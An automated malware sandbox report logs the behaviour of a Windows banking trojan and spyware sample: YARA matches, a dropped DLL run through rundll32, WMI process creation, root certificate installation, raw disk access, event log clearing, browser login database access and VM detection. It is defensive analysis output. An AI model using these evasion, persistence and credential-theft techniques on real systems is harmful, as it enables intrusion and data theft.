        Source: 0000000B.00000002.534434032.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000025.00000002.800294358.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000025.00000002.800294358.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000025.00000002.800294358.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 0000000B.00000002.534434032.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 0000000B.00000002.534434032.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 0000001C.00000002.792847197.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000001C.00000002.792847197.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 0000001C.00000002.792847197.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000007.00000000.285707369.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000007.00000000.285707369.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000007.00000000.285707369.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000019.00000002.797248874.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000019.00000002.797248874.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000019.00000002.797248874.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000024.00000000.426604023.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000024.00000000.426604023.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000024.00000000.426604023.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000023.00000000.417666576.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000023.00000000.417666576.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000023.00000000.417666576.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: C:\Windows\System32\wbem\WMIADAP.exeFile deleted: C:\Windows\System32\wbem\Performance\WmiApRpl.hJump to behavior
        Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.hJump to behavior
        Source: C:\Windows\System32\svchost.exeCode function: String function: 0000022BAF57B6C0 appears 38 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 0000022BAF57B860 appears 40 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 0000022BAF57B6D0 appears 31 times
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04646780: GetModuleHandleA,GetProcAddress,CreateFileA,DeviceIoControl,CloseHandle,5_2_04646780
        Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.dbJump to behavior
        Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winEXE@11/6@4/8
        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04643750 OpenSCManagerW,OpenServiceW,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,5_2_04643750
        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exe:Zone.IdentifierJump to behavior
        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" -h
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",open
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",open
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k WspService
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" -hJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",openJump to behavior
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k WspServiceJump to behavior
        Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0464AC90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,5_2_0464AC90
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0464AD30 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,5_2_0464AD30
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF54DB00 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,7_2_0000022BAF54DB00
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF54DBB0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,7_2_0000022BAF54DBB0
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF57B018 AdjustTokenPrivileges,CreateDIBSection,7_2_0000022BAF57B018
        Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
        Source: C:\Windows\System32\svchost.exeWMI Queries: Provider::ExecMethod - CIMWin32 : Win32_Process::Create
        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\db.datJump to behavior
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF533440 CoCreateInstance,SysFreeString,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,7_2_0000022BAF533440
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_046348F0 LocalAlloc,GetLogicalDriveStringsW,GetVolumeInformationW,SHGetFileInfoW,lstrlenW,lstrlenW,GetDiskFreeSpaceExW,GetDriveTypeW,lstrlenW,SHGetSpecialFolderPathW,SHGetSpecialFolderPathW,lstrlenW,lstrlenW,SHGetSpecialFolderPathW,lstrlenW,lstrlenW,lstrlenW,LocalSize,LocalSize,LocalSize,LocalReAlloc,LocalSize,LocalSize,LocalFree,LocalFree,LocalFree,LocalFree,5_2_046348F0
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
        Source: svchost.exe, 00000009.00000003.444410905.00000244FE39D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04645CA0 GetModuleFileNameW,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,FindCloseChangeNotification,5_2_04645CA0
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",open
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5936:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4648:120:WilError_01
        Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
        Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
        Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
        Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
        Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402911 push ecx; ret 0_2_00402924
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_046567F6 push ecx; ret 5_2_04656809
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF57DEDE push rbx; ret 7_2_0000022BAF57DEDF
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF57BD61 push rbp; retf 7_2_0000022BAF57BD64
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF47341A push ecx; ret 7_2_0000022BAF473435
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF473382 push es; iretd 7_2_0000022BAF473383
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF472A31 push ebp; ret 7_2_0000022BAF472A4B
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF474A39 push esi; ret 7_2_0000022BAF474A47
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF4746DB push ds; ret 7_2_0000022BAF474705
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF471E6B push esp; ret 7_2_0000022BAF471E89
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF4715C1 pushad ; ret 7_2_0000022BAF4715C5
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040AF60 LoadLibraryA,GetProcAddress,_memset,ShellExecuteExW,0_2_0040AF60
        Source: file.exeStatic PE information: real checksum: 0x160d1 should be: 0x142ca

        Persistence and Installation Behavior

        barindex
        Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
        Source: C:\Windows\System32\svchost.exeWMI Queries: Provider::ExecMethod - CIMWin32 : Win32_Process::Create
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetModuleHandleA,GetProcAddress,CreateFileA,DeviceIoControl,CloseHandle, \\.\PhysicalDrive05_2_04646780
        Source: C:\Windows\System32\svchost.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\844918F60F939B112F07B402C479421800EB2CD5 BlobJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\db.dllJump to dropped file

        Boot Survival

        barindex
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetModuleHandleA,GetProcAddress,CreateFileA,DeviceIoControl,CloseHandle, \\.\PhysicalDrive05_2_04646780
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04643750 OpenSCManagerW,OpenServiceW,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,5_2_04643750
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0463A010 ClearEventLogW,OpenEventLogA,ClearEventLogW,CloseEventLog,5_2_0463A010
        Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5HQ15BTC-BI2Q-S1J7-YRC6-SZJY3C3CP8J7}\650478DC7424C37C 1Jump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformationJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetCommandLineW,GetModuleFileNameW,lstrcmpiW,StrStrIW,StrStrIW,CreateThread,CreateThread,CloseHandle,CloseHandle,CreateThread,CloseHandle,StrStrIW,CreateThread,WaitForSingleObject,CloseHandle,StrStrIW,Sleep,Sleep,CreateThread,WaitForSingleObject,CloseHandle,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,5_2_0464C460
        Source: C:\Windows\System32\svchost.exeCode function: GetCommandLineW,GetModuleFileNameW,lstrcmpiW,StrStrIW,CreateThread,CloseHandle,CreateThread,CloseHandle,StrStrIW,CreateThread,WaitForSingleObject,CloseHandle,StrStrIW,Sleep,CreateThread,WaitForSingleObject,CloseHandle,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,7_2_0000022BAF54F840
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04633C305_2_04633C30
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF5344107_2_0000022BAF534410
        Source: C:\Users\user\Desktop\file.exe TID: 5492Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\file.exe TID: 4852Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 5140Thread sleep count: 242 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 772Thread sleep count: 843 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 772Thread sleep time: -42150s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 6120Thread sleep count: 47 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 6120Thread sleep time: -47000s >= -30000sJump to behavior
        Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 4864Thread sleep count: 2696 > 30Jump to behavior
        Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 4864Thread sleep count: 2400 > 30Jump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04645CA0 GetModuleFileNameW,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,FindCloseChangeNotification,5_2_04645CA0
        Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-5539
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,CloseServiceHandle,OpenServiceW,QueryServiceConfigW,StrStrIW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,LocalFree,LocalFree,LocalFree,CloseServiceHandle,5_2_0464BD60
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,OpenServiceW,QueryServiceConfigW,QueryServiceConfig2W,CloseServiceHandle,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalSize,LocalReAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalReAlloc,LocalFree,LocalFree,LocalFree,LocalFree,CloseServiceHandle,5_2_04642FB0
        Source: C:\Windows\System32\svchost.exeCode function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,LocalAlloc,LocalAlloc,OpenServiceW,QueryServiceConfigW,QueryServiceConfig2W,CloseServiceHandle,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalSize,LocalReAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalReAlloc,LocalFree,LocalFree,LocalFree,CloseServiceHandle,7_2_0000022BAF545FD0
        Source: C:\Windows\System32\svchost.exeCode function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,CloseServiceHandle,LocalFree,LocalFree,CloseServiceHandle,7_2_0000022BAF54F0B0
        Source: C:\Windows\System32\svchost.exeCode function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,StartServiceW,CloseServiceHandle,LocalFree,LocalFree,CloseServiceHandle,7_2_0000022BAF54EE60
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 843Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: foregroundWindowGot 1753Jump to behavior
        Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 2696Jump to behavior
        Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 2400Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 4.1 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 3.6 %
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF5344107_2_0000022BAF534410
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04633C305_2_04633C30
        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_046445C0 lstrlenW,GetProcessImageFileNameW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,QueryDosDeviceW,QueryDosDeviceW,GetLastError,QueryDosDeviceW,lstrlenW,wsprintfW,5_2_046445C0
        Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-5540
        Source: svchost.exe, 00000023.00000000.402374012.000002828E323000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware
        Source: svchost.exe, 00000023.00000000.401771191.000002828DC7D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Win32_PnPEntityVMware Virtual disk SCSI Disk Device{4d36e967-e325-11ce-bfc1-08002be10318}System.String[]Win32_PnPEntityDisk driveSCSI\DISK&VEN_ASZ_H8X2&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000System.String[](Standard disk drives)VMware Virtual disk SCSI Disk DeviceDiskDriveSCSI\DISK&VEN_BWBD8LVF&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000diskOKWin32_ComputerSystemcomputerBCAAEBA95E435CA5300A680BE9BF735F04A93ECECD18F46C56865C6158D43B74
        Source: svchost.exe, 00000023.00000000.402374012.000002828E323000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
